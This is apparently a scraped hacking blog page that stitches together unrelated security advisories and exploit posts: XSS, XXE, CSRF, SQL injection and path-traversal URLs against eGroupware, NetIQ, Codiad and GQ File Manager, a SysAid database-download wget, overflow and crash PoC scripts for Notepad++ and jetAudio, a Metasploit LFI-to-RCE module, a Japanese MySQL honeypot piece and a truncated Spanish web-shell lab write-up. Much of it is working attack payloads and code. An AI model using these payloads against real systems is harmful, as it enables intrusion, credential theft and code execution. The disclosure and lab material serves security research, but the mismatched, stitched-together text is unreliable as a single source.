source: https://www.securityfocus.com/bid/47273/info
eGroupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
eGroupware 1.8.001 is vulnerable; other versions may also be affected.
http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109207
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
SEC Consult Vulnerability Lab Security Advisory < 20141218-1 >
=======================================================================
title: OS Command Execution
product: GParted - Gnome Partition Editor
vulnerable version: <=0.14.1
fixed version: >=0.15.0,
<=0.14.1 with fix for CVE-2014-7208 applied
CVE number: CVE-2014-7208
impact: medium
homepage: http://gparted.org/
found: 2014-07
by: W. Ettlinger
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"GParted is a free partition editor for graphically managing your disk
partitions.
With GParted you can resize, copy, and move partitions without data
loss, enabling you to:
* Grow or shrink your C: drive
* Create space for new operating systems
* Attempt data rescue from lost partitions"
URL: http://gparted.org/index.php
Vulnerability overview/description:
-----------------------------------
Gparted <=0.14.1 does not properly sanitize strings before passing
them as parameters to an OS command. Those commands are executed
using root privileges.
Parameters that are being used for OS commands in Gparted are normally
determined by the user (e.g. disk labels, mount points). However, under
certain circumstances, an attacker can use an external storage device to
inject command parameters. These circumstances are met if for example an
automounter uses a filesystem label as part of the mount path.
Please note that GParted versions before 0.15 are still being used
in distributions. E.g Debian Wheezy is vulnerable to this issue before
applying the patches.
Proof of concept:
-----------------
The following command creates a malicious filesystem.
# mkfs.ext2 -L "\`reboot\`" /dev/sdXX
When this filesystem is mounted by an automounter to a mountpoint
containing the filesystem label and the user tries to unmount this filesystem
using GParted, the system reboots.
Vulnerable / tested versions:
-----------------------------
Gparted versions <=0.14.1 were found to be vulnerable.
Vendor contact timeline:
------------------------
2014-10-29: Contacting maintainer (Curtis Gedak) through
gedakc AT users DOT sf DOT net
2014-10-29: Initial response from maintainer offering encryption
2014-10-30: Sending encrypted advisory
2014-10-30: Maintainer confirms the behaviour, will be investigated
further
2014-11-04: Maintainer sends initial patches
2014-11-05: Giving a few notes on the patches
2014-11-05: Maintainer clarifies a few concerns with the patches;
Forwards patches to Mike Fleetwood for review
2014-11-08: Review shows that the patches cause functional
problems; proposes further procedure
2014-11-08: Maintainer proposes a different patching approach
2014-11-08: Reviewer shows concerns with this approach, opens
a security bug (1171909) with Fedora (in accordance with
their Security Tracking Bugs procedure);
Red Hat creates tracking bug 1172549
2014-11-15: New patches for several versions
2014-11-23: Maintainer sends vulnerability information to Debian
2014-11-29: Debian Security Team responds, asks for embargo date and
CVE number
2014-11-30: Release date set to 2014-12-18
2014-12-11: Mailing list linux-distros AT vs DOT openwall DOT org informed
2014-12-11: Writing that embargo may be lifted, SEC Consult will release
advisory on 2014-12-18
2014-12-18: Coordinated release of security advisory
Solution:
---------
Update GParted to version >= 0.15.0 or apply security patches for
CVE-2014-7208.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF W. Ettlinger / @2014
SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >
=======================================================================
title: Multiple high risk vulnerabilities
product: NetIQ Access Manager
vulnerable version: 4.0 SP1
fixed version: 4.0 SP1 Hot Fix 3
CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216,
CVE-2014-5217
impact: High
homepage: https://www.netiq.com/
found: 2014-10-29
by: W. Ettlinger
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor/product description:
---------------------------
"As demands for secure web access expand and delivery becomes increasingly
complex, organizations face some formidable challenges. Access Manager
provides a simple yet secure and scalable solution that can handle all your
web access needs—both internal as well as in the cloud."
URL: https://www.netiq.com/products/access-manager/
Business recommendation:
------------------------
An attacker without an account on the NetIQ Access Manager is be able to gain
administrative access by combining different attack vectors. Though this host
may not always be accessible from a public network, an attacker is still able
to compromise the system when directly targeting administrative users.
Because the NetIQ Access Manager is used for authentication, an attacker
compromising the system can use it to gain access to other systems.
SEC Consult highly recommends that this software is not used until a full
security review has been performed and all issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity Injection (XXE, CVE-2014-5214)
Authenticated administrative users can download arbitrary files from the Access
Manager administration interface as the user "novlwww".
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015993
2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)
Multiple reflected cross site scripting vulnerabilities were found. These
allow effective attacks of administrative and SSLVPN sessions.
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015994
3) Persistent Site Scripting (XSS, CVE-2014-5216)
A persistent cross site scripting vulnerability was found. This allows
effective attacks of administrative and SSLVPN sessions.
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015996
4) Cross Site Request Forgery (CVE-2014-5217)
The Access Manager administration interface does not have CSRF protection.
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015997
5) Information Disclosure (CVE-2014-5215)
Authenticated users of the administration interface can gain authentication
information of internal administrative users.
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015995
By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!
Proof of concept:
-----------------
1) XML eXternal Entity Injection (XXE)
As an example, the following URL demonstrates the retrieval of the /etc/passwd
file as an authenticated administrative user:
https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>
2) Reflected Cross Site Scripting (XSS)
The following URLs demonstrate different reflected XSS flaws in the
administration interface and the user interface.
https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'
https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
3) Persistent Site Scripting (XSS)
The following URL injects a stored script on the auditing page:
https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289
4) Cross Site Request Forgery
As an example, an attacker is able to change the administration password to
'12345' by issuing a GET request in the context of an authenticated
administrator. The old password is not necessary for this attack!
https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345
5) Information Disclosure
The following URLs disclose several useful information to an authenticated
account:
https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp
https://<host>:8443/roma/jsp/debug/debug.jsp
The disclosed system properties:
com.volera.vcdn.monitor.password
com.volera.vcdn.alert.password
com.volera.vcdn.sync.password
com.volera.vcdn.scheduler.password
com.volera.vcdn.publisher.password
com.volera.vcdn.application.sc.scheduler.password
com.volera.vcdn.health.password
The static string "k~jd)*L2;93=Gjs" is XORed with these values in order
to decrypt passwords of internally used service accounts.
By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the NetIQ Access Manager
version 4.0 SP1, which was the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
2014-10-29: Contacting security@netiq.com, sending responsible disclosure
policy and PGP keys
2014-10-29: Vendor redirects to security@novell.com, providing PGP keys
through Novell support page
2014-10-30: Sending encrypted security advisory to Novell
2014-10-30: Novell acknowledges the receipt of the advisory
2014-12-16: Novell: the vulnerability fixes will be released tomorrow;
The CSRF vulnerability will not be fixed immediately
("Since this can be done only after an authorized login");
two XSS vulnerabilities can not be exploited ("We could not
take advantage or retrieve any cookie info on the server
side - it looks like it's a client side cross scripting
attack.")
2014-12-16: Explaining why those vulnerabilities can be exploited
2014-12-17: Novell: Fix will be released tomorrow
2014-12-17: Verifying release of advisory tomorrow
2014-12-18: Novell: Advisory can be released
2014-12-18: Coordinated release of security advisory
Solution:
---------
Update to the latest available of Access Manager and implement workarounds
mentioned in the KB articles by Novell linked above.
Workaround:
-----------
For some vulnerabilities, Novell provides best practice recommendations in the
URLs linked above.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF W. Ettlinger / @2014
Vantage Point Security Advisory 2014-004
========================================
Title: SysAid Server Arbitrary File Disclosure
ID: VP-2014-004
Vendor: SysAid
Affected Product: SysAid On-Premise
Affected Versions: < 14.4.2
Product Website: http://www.sysaid.com/product/sysaid
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>
Summary:
---
SysAid Server is vulnerable to an unauthenticated file disclosure
attack that allows an anonymous attacker to read arbitrary files on
the system. An attacker exploiting this issue can compromise SysAid
user accounts and gain access to important system files. When SysAid
is configured to use LDAP authentication it is possible to gain read
access to the entire Active Directory or obtain domain admin
privileges.
Details:
---
How to download SysAid server database files containing usernames and
password hashes (use any unauthenticated session ID):
wget -O "ilient.mdf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"
wget -O "ilient.ldf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"
The dowloaded MSSQL files contain the LDAP user account and encrypted
password used to access the Active Directory (SysAid encrypts the
password with a static key that is the same for all instances of the
software).
Fix Information:
---
Upgrade to version 14.4.2.
Timeline:
---
2014/11/14: Issue reported
2014/12/22: Patch available and installed by client
About Vantage Point Security:
---
Vantage Point Security is the leading provider for penetration testing
and security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.
Web: https://www.vantagepoint.sg/
Contact: office[at]vantagepoint[dot]sg
# Exploit Title : jetAudio 8.1.3 Basic (Corrupted mp3) Crash POC
# Product : jetAudio Basic
# Date : 8.12.2014
# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
# CVE : unknown at the moment
#============================================================================================
# Open created POC file (fault.mp3) with jetAudio
# Details
# (1e764.1df98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9:
# 0aa6b8b9 8b4804 mov ecx,dword ptr [eax+4] ds:002b:00000004=????????
# 0:000:x86> kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 00000000 00000000 00000000 00000000 00000000 jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9
#============================================================================================
#!/usr/bin/python
pocdata=("\x49\x44\x33\x00\x00\xC9\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\xFF\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x41\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
mp3file = "fault.mp3"
file = open(mp3file , "w")
file.write(pocdata)
file.close()
##################################################################################################
#Exploit Title : phpMyRecipes 1.2.2 SQL injection(page browse.php, parameter category)
#Author : Manish Kishan Tanwar
#Download Link : http://prdownloads.sourceforge.net/php-myrecipes/phpMyRecipes-1.2.2.tar.gz?download
#Date : 23/12/2014
#Discovered at : IndiShell Lab
# Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
# email : manish.1046@gmail.com
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
phpMyRecipes is a simple application for storing and retrieving recipes.
It uses a web-based interface, for ease of use across any system, and a MySQL database backend for storing the recipes.
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to parameter category in browse.php
parameter category is passing to function GetCategoryNameByID without data filtering and due to it, SQL injection vulnerability is arising.
from line 38 to 56
$category = $_GET['category'];
}
$session = getsession();
c_header("Browse Recipes", "browse");
# Build a category string
$cat = $category;
$catstr = "";
while ($cat != 1) {
if ($catstr == "") {
$catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) . "</A>" . $catstr;
} else {
$catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) . "</A> > " . $catstr;
}
$cat = GetCategoryParentByID($cat);
}
////////////////
/// POC ////
///////////////
POC image=http://oi57.tinypic.com/inv3ol.jpg
payload for extracting database name
set value of category parameter to 1 and add error based SQL injection payload to url
http://127.0.0.1/pr/browse.php?category=1 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
#!/usr/bin/python
# Exploit Title: NotePad++ v6.6.9 Buffer Overflow
# URL Vendor: http://notepad-plus-plus.org/
# Vendor Name: NotePad
# Version: 6.6.9
# Date: 22/12/2014
# CVE: CVE-2014-1004
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Risk: Medium
#Description:
#Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages.
#Running in the MS Windows environment, its use is governed by GPL License.
#Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed
#and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon
#dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.
#Proof Concept
#http://i.imgur.com/TTDtxJM.jpg
#Code
import struct
def little_endian(address):
return struct.pack("<L",address)
poc ="\x41" * 591
poc+="\xeb\x06\x90\x90"
poc+=little_endian(0x1004C31F)
poc+="\x90" * 80
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit = header + footer
filename = "notepad.xml"
file = open(filename , "w")
file.write(exploit)
file.close()
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::PHPInclude
def initialize(info = {})
super(update_info(info,
'Name' => 'Lotus Mail Encryption Server (Protector for Mail) Local File Inclusion',
'Description' => %q{
This module exploits a local file inclusion vulnerability in
the Lotus Mail Encryption Server (Protector for Mail Encryption)
administration setup interface. The index.php file uses an unsafe include()
where an unauthenticated remote user may read (traversal) arbitrary file contents.
By abusing a second bug within Lotus, we can inject our payload
into a known location and call it via the LFI to gain remote code execution.
Version 2.1.0.1 Build(88.3.0.1.4323) is known to be vulnerable.
You may need to set DATE in the format YYYY-MM-DD to get this working,
where the remote host and metasploit instance have UTC timezone differences.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.osisecurity.com.au/advisories/' ], #0day
#[ 'CVE', 'X' ],
[ 'OSVDB', '87556'],
#[ 'BID', 'X' ],
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Lotus Mail Encryption Server 2.1.0.1', { }]],
'DisclosureDate' => 'Nov 9 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new("DATE", [false, 'The date of the target system log file in YYYY-MM-DD format']),
], self.class)
end
def check
res = send_request_cgi( { 'uri' => '/' })
if (res.code == 302 && res.body.match(/GetLoginScreen.uevent/))
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def php_exploit
logfile = datastore['DATE'] ? datastore['DATE'] : Time.now.strftime("%Y-%m-%d")
if (logfile !~ /\d\d\d\d-\d\d-\d\d/) # if set by user datastore...
print_error("DATE is in incorrect format (use 'YYYY-MM-DD'). Unable to continue.")
return
end
# set up the initial log file RCE - this is unescaped ascii so we can execute it
# later >:) uid is tomcat so we cannot read apache's logs, and we are stuck inside
# tomcat's php-cgi wrapper which prevents /proc/* injection and a lot of the
# filesystem. example good injected log: '/var/log/ovid/omf-2012-08-01.log' patrick
inject_url = "/omc/GetSetupScreen.event?setupPage=<?php+include+'#{php_include_url}';+?>" # no whitespace
res = send_request_cgi( { 'uri' => inject_url })
if (res and res.code == 404 and res.body.match(/Lotus Protector for Mail Encryption - Page Not Found/)) # it returns a 404 but this is good.
vprint_good("Payload injected...")
response = send_request_cgi( {
'uri' => '/omc/pme/index.php',
'cookie' => "slaLANG=../../../../../../var/log/ovid/omf-#{logfile}.log%00;", # discard .php
})
end
end
end
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Codiad 2.4.3 - Cross Site Scripting - Local File Inclusion Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://codiad.com/
# Vendor Name: Codiad
# Version: 2.4.3
# CVE: CVE-2014-1137
# Author: TaurusOmar
# Tiwtter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High
Description
Codiad is a web-based IDE framework with a small footprint and minimal requirements.
Codiad was built with simplicity in mind, allowing for fast, interactive development without the massive overhead of some of the larger desktop editors. That being said even users of IDE's such as Eclipse, NetBeans and Aptana are finding Codiad's simplicity to be a huge benefit. While simplicity was key, we didn't skimp on features and have a team of dedicated developer actively adding more.
------------------------
+ CROSS SITE SCRIPTING +
------------------------
#Exploiting Description - Get into code xss in next path
/components/filemanager/dialog.php?action=rename&path=3&short_name=
#P0c
http://site.com/components/filemanager/dialog.php?action=rename&path=3&short_name='"><img src=x onerror=prompt(1);>
#Proof Concept
http://i.imgur.com/rr9b42K.jpg
------------------------
+ Local File Incluson +
------------------------
# Exploiting Description - Get into path in ur' browser and download private file server /etc/passwd
#P0c
http://site.com/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined
#Proof Concept
http://i.imgur.com/LSm360S.jpg
MySQLハニーポットの特定の技術的詳細については、インターネット上にあまりにも多くの記事があります。自分でオンラインで記事を検索できます。紹介を書きます:MySQLには、MySQLデータベースにローカルファイルを読み取ることができるロードデータローカルインフィル機能があります。攻撃者がMySQLパスワードを爆発させてMySQLにスキャンして接続するスキャナーを使用しています(ここで修正します。MySQLハニーポットに接続するだけで、ハニーポットでローカル構成ファイルを読み取ることができます。正しいユーザー名とパスワードを提供する必要はありません)、クライアント(攻撃者)応答パケットにローカルインフィルのロードデータを追加して、攻撃者のローカルファイルをデータベースに読み取り、対策の目的を達成します。 (次の写真はインターネット検索からのものです)
CSの構成ファイルプレーンテキストストレージパスワード
CSSクライアントを使用してCSSサーバーを使用したコンピューターに接続する限り、CSSクライアントは固定フォルダーで.aggressor.prop構成ファイルを生成します。 Windowsシステムの場合、ファイルの場所はc: \ uses \ administrator \ .aggressor.propです。この構成ファイルには、CSSリモートコントロールのIPアドレス、ポート、ユーザー名、パスワードが含まれており、すべてプレーンテキストにあります!下の図に示すように:
CSを開くたびに、ログインしたIPアドレス、ポート、ユーザー名、パスワード、その他の情報が表示されます。これらの情報は、local .aggressor.propファイルに保存されます。一般的なコンテンツを以下の図に示します。
したがって、MySQLハニーポットを構築したという結論に達しました。攻撃者がハニーポットに接続すると、HoneypotはMSYQLローカルファイルの読み取り脆弱性を使用して、C: \ uses \ administrator \ .aggressor.propファイルのコンテンツを自動的に読み取ります。 Honeypotは、攻撃者のCCSサーバーIPアドレス、ポート、ユーザー名、パスワードを正常に取得できます。
環境実験を正常に構築しました
上記の推測を検証するために、実際にテストする必要があります。 githubからpythonで書かれたmysqlハニーポットスクリプトを見つけて、単にローカルに変更するだけで、ファイル読み取りのパスをC: \ uses \ administrator \ .aggressor.propに変更し、スクリプトを実行します。以下の図に示すように、ローカルポート3306を聴くMySQLハニーポットが構築されています。
MySQLに接続する赤チーム担当者の動作をシミュレートするために、NAVICATを使用して、このハニーポットのIPアドレスをリモートで接続します。 (もう一度強調するために、MySQLのユーザー名とパスワードを知る必要はありません。間違ったユーザー名とパスワードを入力します。MySQLHoneypotもローカルファイルを読むことができます)
下の図に示すように、MySQLハニーポットは、現在のディレクトリのログファイルにBase64暗号化されたCS構成ファイルのコンテンツを提供します。
Base64が復号化された後の結果は次のとおりです。
・
取得したIPアドレス、ポート、ユーザー名、およびパスワードはCSSサーバーに接続されていました(次の写真はインターネットからのものです)
Windowsの下では、WeChatのデフォルトの構成ファイルはc: \ uses \ username \ documents \ wechatファイルに配置されます。それを調べると、c: \ uses \ username \ documents \ wechat files \ alues \ config \ config.dataが含まれていることがわかります。
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://installatron.com/phpfilemanager
# Vendor Name: GQ File Manager
# Version: 0.2.5
# CVE: CVE-2014-1137
# Author: TaurusOmar
# Tiwtter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High
Description
GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet.
------------------------
+ CROSS SITE SCRIPTING +
------------------------
# Exploiting Description - Created new file example:("xss.html")in the document insert code xss
Input:
"><img src=x onerror=;;alert('XSS') />
Output:
<br />
<b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br />
"><img src=x onerror=alert("xss");>
#P0c
"><img src=x onerror=;;alert('XSS') />
#Proof Concept
http://i.imgur.com/cjIvR5l.jpg
------------------------
+ Sql Injection +
------------------------
# Exploiting Description - The Sql Injection in path created a new file.
#P0c
http://site.com/GQFileManager/index.php?&&output=create&create=[sql]
#Proof Concept
http://i.imgur.com/IJZoDVt.jpg
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Remote code execution via polyglot web shell upload”.
Para resolver el laboratorio tenemos que subir un archivo PHP que lea y nos muestre el contenido del archivo /home/carlos/secret. Ya que para demostrar que hemos completado el laboratorio, deberemos introducir el contenido de este archivo.
Además, el servidor está configurado para verificar si el archivo es una imagen fijándose en el contenido del mismo.
En este caso, el propio laboratorio nos proporciona una cuenta para iniciar sesión, por lo que vamos a hacerlo:
Una vez hemos iniciado sesión, nos encontramos con el perfil de la cuenta:
Como podemos ver, tenemos una opción para subir archivo, y concretamente parece ser que se trata de actualizar el avatar del perfil. Vamos a intentar aprovecharnos de esta opción para subir el siguiente archivo PHP:
Ojo, si nos fijamos, en este caso, además del propio código PHP. Estoy definiendo un string al principio del archivo. Esto ocurre porque para determinar el tipo de contenido de un archivo, se usan los primeros bytes, lo que se conoce como “magic numbers”. Estos primeros bytes de los archivos determinan de que tipo es o como se trataran, aunque el contenido sea totalmente distinto.
Como vemos, contiene un código PHP, pero el propio linux lo detecta como una imagen, esto ocurre por los magic numbers.
En el siguiente enlace os dejo una lista de los magic numbers asociados a los diferentes tipos de archivos:
- https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5
